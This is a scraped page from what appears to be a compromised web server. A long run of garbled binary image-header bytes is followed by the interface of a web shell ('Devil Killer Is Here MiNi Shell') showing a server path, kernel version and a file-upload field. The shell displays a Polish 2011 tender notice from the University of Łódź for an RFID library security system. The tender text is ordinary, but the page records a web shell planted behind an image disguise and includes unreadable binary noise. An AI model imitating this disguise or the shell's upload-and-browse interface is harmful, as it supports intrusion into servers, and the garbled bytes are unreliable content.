JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110530/151765-N-2011.html

<p class="kh_header"><b>Łódź: Dostawa i instalacja elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID dla Wydziału Ekonomiczno - Socjologicznego oraz Wydziału Nauk Geograficznych Uniwersytetu Łódzkiego</b><br>
<b>Numer ogłoszenia: 151765 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Łódzki , ul. Narutowicza 65, 90-131 Łódź, woj. łódzkie, tel. 0-42 635 43 54, faks 0-42 635 43 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.lodz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.uni.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i instalacja elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID dla Wydziału Ekonomiczno - Socjologicznego oraz Wydziału Nauk Geograficznych Uniwersytetu Łódzkiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i  instalacja systemu elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID , który ma pracować w oparciu o technologię RFID (Radio Frequency Identification - identyfikacji za pomocą fal radiowych) w częstotliwości przeznaczonej do tego typu zastosowań - 13.56MHz.
2.Pełna lista przedmiotów składających się na niniejsze zamówienie zamieszczona jest w Arkuszu kalkulacyjnym stanowiącym załącznik nr  1  do niniejszej specyfikacji.
Dostawa obejmuje sprzęt fabrycznie nowy. 
3. Oferowany system RFID musi być zgodny z normami obowiązującymi w Unii Europejskiej. Urządzenia muszą posiadać niezbędne certyfikaty zgodności z normą CE.4.technologia RFID ma służyć do realizowania wszystkich funkcji systemu  taki jak :
-	identyfikacja zbiorów bibliotecznych,
-	Informacja sieciowa jest przygotowana  i użytkowana przez system Windows , dlatego zatem opisując Zamawiający system operacyjny używa znaku towarowego Windows.

-	ochrona zbiorów bibliotecznych przed niekontrolowanym i bezprawnym ich wyniesieniem
poza teren chroniony,
-	obsługowe i samoobsługowe wypożyczenia i zwroty zbiorów bibliotecznych,
-	kodowanie etykiet RFID, przyjmowanie nowych książek /kodowanie/
-	porządkowanie i kontrola księgozbioru,
-	skontrum księgozbioru
-	administrowanie systemem RFID
System RFID musi być w pełni zintegrowany ze stosowanym obecnie w bibliotece zautomatyzowanym systemem bibliotecznym Horizon, zwanym dalej systemem bibliotecznym. 
5. Komunikacja z systemem bibliotecznym ma odbywać się z wykorzystaniem protokołu SIP2. System RFID musi korzystać z danych przechowywanych w systemie bibliotecznym bez konieczności ich replikacji. Dotyczy to zarówno danych dotyczących zbiorów bibliotecznych, jak i danych dotyczących różnych kategorii użytkowników systemu, w tym ich uprawnień. W przypadku braku uprawnień do wykonywania operacji w systemie bibliotecznym system RFID musi informować użytkownika za pomocą stosownych komunikatów wizualnych i dźwiękowych.
3.3Dostawa  przedmiotu zamówienia obejmuje również dostawę niezbędnych do pracy, pełnowartościowych, fabrycznie nowych, oryginalnych i nieregenerowanych materiałów eksploatacyjnych zalecanych przez producenta sprzętu( Zamawiający nie dopuszcza oferowania materiałów eksploatacyjnych tzw. startowych). Termin wykonania zamówienia
Zamówienie będzie zrealizowane w terminie  
Pakiet 1: -  10 dni  od daty podpisania umowy.
Pakiet 2: - 14 dni  od daty podpisania umowy ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.20.00.00-5, 32.20.00.00-5, 32.44.00.00-9, 32.42.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wysokości: 7.800 zł. (słownie zł: siedem tysięcy osiemset złotych  gr.). Jednakże całość wadium Wykonawca zobowiązany jest wpłacić w przypadku, gdy składa ofertę na wszystkie części przedmiotu zamówienia, określonego w załączniku nr 9 do SIWZ - Arkuszu cenowym. Jeżeli Wykonawca składa ofertę na kilka lub tylko jedną część przedmiotu zamówienia opisanego wyżej, wówczas jest on zobowiązany do wpłaty wadium jedynie za części, na które składa on ofertę. Kwoty wadium do poszczególnych części zamówienia zostały określone w załączniku nr 4 do niniejszej SIWZ. Wpłacona przez wykonawcę kwota wadium powinna również uwzględniać ewentualne koszty związane z prowizją bankową za przelew kwoty wadium na konto wskazane przez zamawiającego. 
2.	Wadium należy wnieść najpóźniej do dnia osta?tecznego terminu składania ofert. 
3.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych 
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.). 
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust. 4a i 5 ustawy Prawo zamówień publicznych
Wadium wnoszone w formach innych niż w pieniądzu, winno być w formie oryginału złożone (oddzielnie od oferty) w Biurze Inwestycji i Nieruchomości UŁ, ul. Lindleya 3, 90-131 Łódź, pok.226 (godz.8.00 - 15.00). Prosimy nie załączać oryginału gwarancji lub poręczenia do oferty. 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego a oryginał dowodu przelewu załączyć do składanej oferty.
Nr konta Uniwersytetu Łódzkiego: 
Bank Polska Kasa Opieki S.A. II Oddział w Łodzi, ul. Piotrkowska 270, 
nr 86 1240 3028 1111 0000 2822 2488.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dla Pakietu nr 1: Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli w wykazie wykonanych dostaw a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  dostaw  posiada co  najmniej 3 dostawy , systemów ochrony zbiorów bibliotecznych w jednorodnej technologii RFID HF w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości minimum 120 tys. zł netto każda wraz z dokumentami potwierdzającymi, że dostawy te zostały wykonane lub są wykonywane należycie. Wykaz zawierający przynajmniej 3 dostawy spełniający określone wcześniej warunki należy złożyć wypełniając załącznik nr 7


UWAGA:w przypadku wykonawców systemów ochrony zbiorów bibliotecznych w jednorodnej technologii RFID HF, którzy realizowali dostawy w innych walutach niż PLN, Zamawiający przeliczy wartość netto tych dostaw po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.

Dla  Pakietu nr 2 :
Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli w wykazie wykonanych dostaw a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  dostaw  posiada co  najmniej 3 dostawy , systemów ochrony zbiorów bibliotecznych w jednorodnej technologii RFID HF w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości minimum 100tys. zł netto każda wraz z dokumentami potwierdzającymi, że dostawy te zostały wykonane lub są wykonywane należycie. Wykaz zawierający przynajmniej 3 dostawy spełniający określone wcześniej warunki należy złożyć wypełniając załącznik nr 7


UWAGA:w przypadku wykonawców systemów ochrony zbiorów bibliotecznych w jednorodnej technologii RFID HF, którzy realizowali dostawy w innych walutach niż PLN, Zamawiający przeliczy wartość netto tych dostaw po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.
W sytuacji gdy Wykonawca  bierze udział w obu pakietach musi złożyć jeden wykaz na  kwotę min 200tys. zawierający przynajmniej 3 dostawy spełniający określone wcześniej warunki należy złożyć wypełniając załącznik nr 7</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek jeżeli:
a)	Wykonawca potwierdzi w informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowe, w którym posiada rachunek wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 100 tys. zł, co powinno jednoznacznie wynikać z w/w informacji.

UWAGA: w przypadku wykonawców, którzy wykażą środki finansowe lub zdolność kredytową w innej walucie niż PLN, Zamawiający przeliczy ich wartość po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.

b)	Wykonawca wykaże w opłaconej polisie, a w przypadku jej braku w innym dokumencie potwierdzającym, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 tys. zł.
UWAGA: w przypadku wykonawców, którzy przedstawią polisę lub inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej  w innej walucie niż PLN, Zamawiający przeliczy ich wartość po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy potwierdzające, że przedmiot zamówienia posiada oznakowanie zgodności, zgodnie z nowelizacją ustawy o systemie zgodności z dnia 15.12.2006r. (Dz. U. Nr 249, poz. 1834),
- Sterownik do czytnika MRR  zgodnie z normą EN 300 330, EN 60950, EN 300 683
-Etykiety biblioteczne 20000szt. Wydział Ekonomii, 1500szt. Wydział Nauk Geograficznych wykonane zgodnie ze standardem ISO 15963 i normami europejskimi pracujące w paśmie częstotliwości 13, 56 MHZ, przeznaczonej do aplikacji bibliotecznych. 
- W przypadku oferowania sprzętu równoważnego lub sprzętu, którego Zamawiający nie wskazał z nazwy, modelu, typu, szczegółową specyfikacje , opis systemu ( np. karty katalogowe, foldery informacyjne itp.) asortymentu oferowanego, z której w sposób nie budzący wątpliwości wynika , że zaproponowany produkt spełnia warunek równoważności.

Zamawiający wymaga aby katalogi były przedstawione w języku polskim.
8.3.1  Zamawiający wymaga, by dostarczone urządzenia były nowe oraz by były nieużywane (przy czym Zamawiający dopuszcza, by urządzenia były rozpakowane i uruchomione przed ich dostarczeniem wyłącznie przez wykonawcę i wyłącznie w celu weryfikacji działania urządzenia, przy czym Wykonawca jest zobowiązany do poinformowania Zamawiającego o zamiarze rozpakowania sprzętu, a Zamawiający ma prawo inspekcji sprzętu przed jego rozpakowaniem);</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)	Zmiany powszechnie obwiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiany urzędowej stawki podatku VAT. W przypadku zmiany ustawowej stawki podatku VAT  kwota brutto wynagrodzenia Wykonawcy nie ulegnie zmianie. W zależności od wysokości nowych ( zmienionych) stawek podatku VAT, podwyższeniu bądź obniżeniu ulega kwota netto wynagrodzenia Wykonawcy
b)	po podpisaniu umowy doszło do wydłużenia okresu gwarancyjnego przez producenta,
c)	nastąpiła zmiana danych wykonawcy, np. zmiana adresu, konta bankowego, nr Regon, osób kontaktowych. 
d)	wycofania z sieci dystrybucji modelu sprzętu, który Sprzedawca zaoferował w ofercie i niemożliwości dostarczenia go Kupującemu, Sprzedawca zobowiązany jest zapewnić model będący technologicznym następcą sprzętu pierwotnie zaoferowanego. W sytuacji gdy model będący następcą ma gorsze parametry lub nie posiada wszystkich cech użytkowych modelu pierwotnego, sprzedawca zobowiązany jest dostarczyć model inny o identycznych lub lepszych parametrach. Przed wykonaniem dostawy Sprzedawca zobowiązany jest złożyć u Kupującego oświadczenie potwierdzające niemożliwość dostarczenia oferowanego modelu oraz wskazujące model i typ urządzenia proponowanego wraz z zapewnieniem o spełnianiu minimalnych parametrów wymaganych. Brak sprzeciwu ze strony Kupującego w okresie 2 dni od otrzymania oświadczenia uznaje się jako zgodę na zmianę sprzętu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Biurze Inwestycji i Nieruchomości UŁ przy ul. Lindleya 3, pok. 226 do dnia 06.06 2011 r. do godz. 930..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2011 godzina 09:30, miejsce: Oferty należy składać w Biurze Inwestycji i Nieruchomości UŁ przy ul. Lindleya 3, pok. 226 do dnia 06.06 2011 r. do godz. 930..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawy objęte niniejszym postępowaniem finansowane są z Europejskiego Funduszu Rozwoju Regionalnego na podstawie umowy o dofinansowanie Centrum Informatyczno-Ekonometryczne Wydziału Ekonomiczno-Socjologicznego Uniwersytetu Łódzkiego w ramach działania 13.1 priorytetu XIII Programu Operacyjnego Infrastruktura i Środowisko 2007 -2013 z dnia 30 kwietnia 2009 r. W pakiecie nr 1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i instalacja elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID dla Wydziału Ekonomiczno - Socjologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa i  instalacja systemu elektronicznego zabezpieczenia zbiorów bibliotecznych w technologii radiowej identyfikacji - RFID , który ma pracować w oparciu o technologię RFID (Radio Frequency Identification - identyfikacji za pomocą fal radiowych) w częstotliwości przeznaczonej do tego typu zastosowań - 13.56MHz.
2.Pełna lista przedmiotów składających się na niniejsze zamówienie zamieszczona jest w Arkuszu kalkulacyjnym stanowiącym załącznik nr  1  do niniejszej specyfikacji.
Dostawa obejmuje sprzęt fabrycznie nowy. 
3. Oferowany system RFID musi być zgodny z normami obowiązującymi w Unii Europejskiej. Urządzenia muszą posiadać niezbędne certyfikaty zgodności z normą CE.4.technologia RFID ma służyć do realizowania wszystkich funkcji systemu  taki jak :
-	identyfikacja zbiorów bibliotecznych,
-	Informacja sieciowa jest przygotowana  i użytkowana przez system Windows , dlatego zatem opisując Zamawiający system operacyjny używa znaku towarowego Windows.

-	ochrona zbiorów bibliotecznych przed niekontrolowanym i bezprawnym ich wyniesieniem
poza teren chroniony,
-	obsługowe i samoobsługowe wypożyczenia i zwroty zbiorów bibliotecznych,
-	kodowanie etykiet RFID, przyjmowanie nowych książek /kodowanie/
-	porządkowanie i kontrola księgozbioru,
-	skontrum księgozbioru
-	administrowanie systemem RFID
System RFID musi być w pełni zintegrowany ze stosowanym obecnie w bibliotece zautomatyzowanym systemem bibliotecznym Horizon, zwanym dalej systemem bibliotecznym. 
5. Komunikacja z systemem bibliotecznym ma odbywać się z wykorzystaniem protokołu SIP2. System RFID musi korzystać z danych przechowywanych w systemie bibliotecznym bez konieczności ich replikacji. Dotyczy to zarówno danych dotyczących zbiorów bibliotecznych, jak i danych dotyczących różnych kategorii użytkowników systemu, w tym ich uprawnień. W przypadku braku uprawnień do wykonywania operacji w systemie bibliotecznym system RFID musi informować użytkownika za pomocą stosownych komunikatów wizualnych i dźwiękowych.
